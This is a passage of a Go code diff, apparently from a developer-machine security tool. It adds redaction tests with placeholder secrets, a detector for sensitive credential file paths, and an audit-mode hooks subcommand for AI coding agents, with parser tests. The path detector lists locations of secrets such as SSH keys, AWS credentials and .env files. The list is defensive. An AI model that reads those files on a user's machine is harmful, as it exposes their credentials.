ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa then bearer eyJ.payload.sig.AAAAAAAAAAA" + out := String(in) + for _, banned := range []string{ + "AKIAIOSFODNN7EXAMPLE", + "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + "eyJ.payload.sig.AAAAAAAAAAA", + } { + if strings.Contains(out, banned) { + t.Errorf("multi-secret line still contains %q: %q", banned, out) + } + } +} + +func TestStringRedactsGitHubFineGrainedPAT(t *testing.T) { + // Fine-grained PATs use a different prefix from classic ghp_ tokens + // and contain an inner underscore between the prefix and body. + in := "GH_TOKEN=github_pat_11ABCDEFG0123456789_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMN" + out := String(in) + if strings.Contains(out, "github_pat_11ABCDEFG0123456789_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMN") { + t.Errorf("github fine-grained PAT not redacted: %q", out) + } +} + +func TestStringRedactsPrivateKeyVariants(t *testing.T) { + // All four PEM/armor variants the audit pipeline can plausibly see + // must redact the whole block, not just one BEGIN/END line. + cases := []struct { + name string + in string + mustOut string // body content that must NOT appear after redaction + }{ + { + name: "RSA", + in: "-----BEGIN RSA PRIVATE KEY-----\nBODYRSA\n-----END RSA PRIVATE KEY-----", + mustOut: "BODYRSA", + }, + { + name: "PKCS8", + in: "-----BEGIN PRIVATE KEY-----\nBODYPKCS8\n-----END PRIVATE KEY-----", + mustOut: "BODYPKCS8", + }, + { + name: "OPENSSH", + in: "-----BEGIN OPENSSH PRIVATE KEY-----\nBODYSSH\n-----END OPENSSH PRIVATE KEY-----", + mustOut: "BODYSSH", + }, + { + name: "PGP", + in: "-----BEGIN PGP PRIVATE KEY BLOCK-----\nBODYPGP\n-----END PGP PRIVATE KEY BLOCK-----", + mustOut: "BODYPGP", + }, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + out := String(tc.in) + if strings.Contains(out, tc.mustOut) { + t.Errorf("%s body leaked: %q", tc.name, out) + } + if !strings.Contains(out, Placeholder) { + t.Errorf("%s missing placeholder: %q", tc.name, out) + } + }) + } +} + +func TestBytesWrapsString(t *testing.T) { + // Bytes is a thin wrapper. Test the three input shapes a caller can + // hand it: nil, empty slice, populated. + if got := Bytes(nil); got != nil { + t.Errorf("Bytes(nil) = %v, want nil", got) + } + if got := Bytes([]byte{}); len(got) != 0 { + t.Errorf("Bytes(empty) = %v, want empty", got) + } + in := []byte("Authorization: Bearer eyJ.payload.sig.AAAAAAAAAAA") + out := Bytes(in) + if strings.Contains(string(out), "eyJ.payload.sig.AAAAAAAAAAA") { + t.Errorf("Bytes did not redact: %q", string(out)) + } +} + +func TestValueHandlesNonStringLeaves(t *testing.T) { + // Numbers, booleans, and nil must pass through untouched. Only string + // leaves get redacted. + in := map[string]any{ + "count": 42, + "ratio": 0.5, + "flag": true, + "missing": nil, + "note": "no secret here", + } + out := Value(in).(map[string]any) + if out["count"] != 42 { + t.Errorf("int leaf mutated: %v", out["count"]) + } + if out["ratio"] != 0.5 { + t.Errorf("float leaf mutated: %v", out["ratio"]) + } + if out["flag"] != true { + t.Errorf("bool leaf mutated: %v", out["flag"]) + } + if out["missing"] != nil { + t.Errorf("nil leaf mutated: %v", out["missing"]) + } + if out["note"] != "no secret here" { + t.Errorf("clean string leaf mutated: %v", out["note"]) + } +} + +func TestValueRedactsSecretKeyEvenWithNonStringValue(t *testing.T) { + // A secret-looking key replaces the value with [REDACTED] regardless + // of value type — a numeric token is still a token. + in := map[string]any{ + "token": 12345, + "secret": []any{"a", "b"}, + "safe": "ok", + } + out := Value(in).(map[string]any) + if out["token"] != Placeholder { + t.Errorf("numeric token not redacted: %v", out["token"]) + } + if out["secret"] != Placeholder { + t.Errorf("array under secret key not redacted: %v", out["secret"]) + } + if out["safe"] != "ok" { + t.Errorf("safe leaf mutated: %v", out["safe"]) + } +} + +func TestValueDeeplyNested(t *testing.T) { + // Three-level nesting through both maps and slices. Redaction must + // reach the innermost string. + in := map[string]any{ + "l1": map[string]any{ + "l2": []any{ + map[string]any{ + "headers": []any{ + "Authorization: Bearer eyJ.payload.sig.AAAAAAAAAAA", + }, + }, + }, + }, + } + out := Value(in).(map[string]any) + l1 := out["l1"].(map[string]any) + l2 := l1["l2"].([]any) + l3 := l2[0].(map[string]any) + hdr := l3["headers"].([]any)[0].(string) + if strings.Contains(hdr, "eyJ.payload.sig.AAAAAAAAAAA") { + t.Errorf("deeply nested bearer not redacted: %q", hdr) + } +} + +func TestIsSensitivePathWindowsBackslash(t *testing.T) { + // IsSensitivePath normalizes backslashes so a Windows path hits the + // same regexes as the POSIX equivalent. + for _, p := range []string{ + `C:\Users\x\.env`, + `C:\Users\x\.aws\credentials`, + `C:\Users\x\.ssh\id_rsa`, + `secrets\db.yaml`, + } { + if !IsSensitivePath(p) { + t.Errorf("expected %q (Windows-style) to be sensitive", p) + } + } +} + +func TestIsSensitivePathEmpty(t *testing.T) { + if IsSensitivePath("") { + t.Error("empty path must not be flagged sensitive") + } +} + +func TestIsSensitivePath(t *testing.T) { + yes := []string{ + "/Users/x/.env", + "./.env.production", + "app/secrets/db.yaml", + "keys/server.pem", + "id_rsa.key", + "cert.p12", + "/home/x/.ssh/id_rsa", + "/Users/x/.aws/credentials", + "./.npmrc", + "./.pypirc", + } + for _, p := range yes { + if !IsSensitivePath(p) { + t.Errorf("expected %q to be sensitive", p) + } + } + no := []string{"README.md", "src/main.go", "config.json"} + for _, p := range no { + if IsSensitivePath(p) { + t.Errorf("expected %q to NOT be sensitive", p) + } + } +} diff --git a/internal/cli/cli.go b/internal/cli/cli.go index 04e1515..29ab40a 100644 --- a/internal/cli/cli.go +++ b/internal/cli/cli.go @@ -4,14 +4,20 @@ import ( "fmt" "os" "path/filepath" + "slices" "strings" "github.com/step-security/dev-machine-guard/internal/buildinfo" ) // Config holds all parsed CLI flags. +// +// The hidden `_hook` runtime is intentionally NOT represented here. Agents +// invoke `_hook` on every event and any non-zero exit is treated as a hook +// failure, so the hot path bypasses cli.Parse entirely — see main.go's +// early-return and internal/aiagents/cli.RunHook. type Config struct { - Command string // "", "install", "uninstall", "send-telemetry", "configure", "configure show" + Command string // "", "install", "uninstall", "send-telemetry", "configure", "configure show", "hooks install", "hooks uninstall" OutputFormat string // "pretty", "json", "html" OutputFormatSet bool // true if --pretty/--json/--html was explicitly passed (not persisted) HTMLOutputFile string // set by --html (not persisted) @@ -23,10 +29,33 @@ type Config struct { EnablePythonScan *bool // nil=auto, true/false=explicit IncludeBundledPlugins bool // --include-bundled-plugins: include bundled/platform plugins in output SearchDirs []string // defaults to ["$HOME"] + + // HooksAgent is the --agent value on `hooks install` / `hooks uninstall`; + // "" means "every detected agent". + HooksAgent string +} + +// supportedHookAgents lists the agent names accepted by `hooks --agent ` and `_hook ...`. +// Supported agents: claude-code and codex; the list grows as adapters are added. +var supportedHookAgents = []string{"claude-code", "codex"} + +func isSupportedHookAgent(name string) bool { + return slices.Contains(supportedHookAgents, name) } // Parse parses CLI arguments and returns a Config. func Parse(args []string) (*Config, error) { + // AI-agent hooks subcommands have a deliberately narrow flag surface: + // only `--agent ` (and `--help`) are accepted. None of the DMG + // scan/output flags apply, so we branch off the main parser here to + // reject them with a clear error rather than silently honoring them. + // + // Note: the hidden `_hook` runtime does NOT route through Parse — main + // intercepts it before any init runs. Don't add a `_hook` arm here. + if len(args) > 0 && args[0] == "hooks" { + return parseHooks(args[1:]) + } + cfg := &Config{ OutputFormat: "pretty", ColorMode: "auto", @@ -136,6 +165,97 @@ func Parse(args []string) (*Config, error) { return cfg, nil } +// parseHooks handles `hooks install` and `hooks uninstall`. +// +// Accepted flags: --agent , --help. Anything else (including DMG global +// flags like --json, --verbose, --search-dirs) is rejected so users get a +// clear signal that those flags don't apply to the hooks group. +func parseHooks(args []string) (*Config, error) { + if len(args) == 0 { + return nil, fmt.Errorf("missing subcommand: expected `hooks install` or `hooks uninstall`, run '%s hooks --help' for usage", filepath.Base(os.Args[0])) + } + + verb := args[0] + switch verb { + case "install", "uninstall": + // continue + case "-h", "--help", "help": + printHooksHelp() + os.Exit(0) + default: + return nil, fmt.Errorf("unknown `hooks` subcommand: %s, run '%s hooks --help' for usage", verb, filepath.Base(os.Args[0])) + } + + cfg := &Config{ + Command: "hooks " + verb, + OutputFormat: "pretty", + ColorMode: "auto", + SearchDirs: []string{"$HOME"}, + } + + rest := args[1:] + for i := 0; i < len(rest); i++ { + arg := rest[i] + switch { + case arg == "--agent": + i++ + if i >= len(rest) { + return nil, fmt.Errorf("--agent requires an agent name (one of: %s)", strings.Join(supportedHookAgents, ", ")) + } + name := rest[i] + if !isSupportedHookAgent(name) { + return nil, fmt.Errorf("unsupported agent: %s (supported: %s)", name, strings.Join(supportedHookAgents, ", ")) + } + cfg.HooksAgent = name + case strings.HasPrefix(arg, "--agent="): + name := strings.TrimPrefix(arg, "--agent=") + if name == "" { + return nil, fmt.Errorf("--agent requires an agent name (one of: %s)", strings.Join(supportedHookAgents, ", ")) + } + if !isSupportedHookAgent(name) { + return nil, fmt.Errorf("unsupported agent: %s (supported: %s)", name, strings.Join(supportedHookAgents, ", ")) + } + cfg.HooksAgent = name + case arg == "-h" || arg == "--help": + printHooksHelp() + os.Exit(0) + default: + return nil, fmt.Errorf("unknown option for `hooks %s`: %s (only --agent is accepted)", verb, arg) + } + } + + return cfg, nil +} + +func printHooksHelp() { + name := filepath.Base(os.Args[0]) + _, _ = fmt.Fprintf(os.Stdout, `StepSecurity Dev Machine Guard v%s — AI agent hooks + +Usage: %s hooks [--agent ] + +Subcommands: + install Install audit-mode hooks for detected AI coding agents. + Hook events are uploaded to your StepSecurity dashboard; + no agent activity is blocked. + uninstall Remove hooks previously installed by this tool. + +Options: + --agent Target a specific agent (default: every detected agent). + Supported: %s + +Examples: + %s hooks install # install for every detected agent + %s hooks install --agent claude-code # install only for Claude Code + %s hooks uninstall # remove all DMG-owned hook entries + +Diagnostics: + Hook errors are appended to ~/.stepsecurity/ai-agent-hook-errors.jsonl. + +%s +`, buildinfo.Version, name, strings.Join(supportedHookAgents, ", "), + name, name, name, buildinfo.AgentURL) +} + func printHelp() { name := filepath.Base(os.Args[0]) _, _ = fmt.Fprintf(os.Stdout, `StepSecurity Dev Machine Guard v%s @@ -148,6 +268,7 @@ Commands: install Install scheduled scanning (enterprise) uninstall Remove scheduled scanning (enterprise) send-telemetry Upload scan results to the StepSecurity dashboard (enterprise) + hooks Install/uninstall AI coding agent hooks (run '%s hooks --help') Output formats (community mode, mutually exclusive): --pretty Pretty terminal output (default) @@ -186,7 +307,7 @@ Configuration: Run '%s configure' to set enterprise credentials and search directories interactively. %s -`, buildinfo.Version, name, +`, buildinfo.Version, name, name, name, name, name, name, name, name, name, name, name, name, name, buildinfo.AgentURL) diff --git a/internal/cli/cli_test.go b/internal/cli/cli_test.go index 32cd6c5..a3865cc 100644 --- a/internal/cli/cli_test.go +++ b/internal/cli/cli_test.go @@ -181,3 +181,107 @@ func TestParse_FlagCombinations(t *testing.T) { t.Errorf("unexpected config: %+v", cfg) } } + +// --- AI agent hooks group --- + +func TestParse_HooksInstall_NoAgent(t *testing.T) { + cfg, err := Parse([]string{"hooks", "install"}) + if err != nil { + t.Fatal(err) + } + if cfg.Command != "hooks install" { + t.Errorf("expected command=`hooks install`, got %q", cfg.Command) + } + if cfg.HooksAgent != "" { + t.Errorf("expected empty HooksAgent (= all detected), got %q", cfg.HooksAgent) + } +} + +func TestParse_HooksInstall_AgentSpaceForm(t *testing.T) { + cfg, err := Parse([]string{"hooks", "install", "--agent", "claude-code"}) + if err != nil { + t.Fatal(err) + } + if cfg.Command != "hooks install" || cfg.HooksAgent != "claude-code" { + t.Errorf("unexpected: cmd=%q agent=%q", cfg.Command, cfg.HooksAgent) + } +} + +func TestParse_HooksInstall_AgentEqualsForm(t *testing.T) { + cfg, err := Parse([]string{"hooks", "install", "--agent=codex"}) + if err != nil { + t.Fatal(err) + } + if cfg.HooksAgent != "codex" { + t.Errorf("expected codex, got %q", cfg.HooksAgent) + } +} + +func TestParse_HooksUninstall(t *testing.T) { + cfg, err := Parse([]string{"hooks", "uninstall", "--agent", "codex"}) + if err != nil { + t.Fatal(err) + } + if cfg.Command != "hooks uninstall" || cfg.HooksAgent != "codex" { + t.Errorf("unexpected: cmd=%q agent=%q", cfg.Command, cfg.HooksAgent) + } +} + +func TestParse_HooksMissingSubcommand(t *testing.T) { + _, err := Parse([]string{"hooks"}) + if err == nil { + t.Error("expected error for bare `hooks` with no subcommand") + } +} + +func TestParse_HooksUnknownSubcommand(t *testing.T) { + _, err := Parse([]string{"hooks", "frobnicate"}) + if err == nil { + t.Error("expected error for unknown hooks subcommand") + } +} + +func TestParse_HooksUnsupportedAgent(t *testing.T) { + _, err := Parse([]string{"hooks", "install", "--agent", "cursor"}) + if err == nil { + t.Error("expected error for unsupported agent") + } +} + +func TestParse_HooksAgentMissingValue(t *testing.T) { + cases := [][]string{ + {"hooks", "install", "--agent"}, + {"hooks", "install", "--agent="}, + {"hooks", "uninstall", "--agent="}, + } + for _, args := range cases { + _, err := Parse(args) + if err == nil { + t.Errorf("expected error for missing --agent value: %v", args) + } + } +} + +// DMG global flags must not leak into the hooks group. +func TestParse_HooksRejectsGlobalFlags(t *testing.T) { + cases := [][]string{ + {"hooks", "install", "--json"}, + {"hooks", "install", "--verbose"}, + {"hooks", "install", "--search-dirs", "/tmp"}, + {"hooks", "install", "--enable-npm-scan"}, + {"hooks", "install", "--color=always"}, + {"hooks", "uninstall", "--pretty"}, + } + for _, args := range cases { + _, err := Parse(args) + if err == nil { + t.Errorf("expected error rejecting global flag in %v", args) + } + } +} + +// The `_hook` runtime is intentionally not handled by Parse — main.go +// intercepts it before any init runs to honor the fail-open contract. +// See internal/aiagents/cli/hook_test.go for handler-level tests and +// cmd/stepsecurity-dev-machine-guard/main_test.go for the integration +// test that asserts the binary always exits 0 on `_hook` invocations.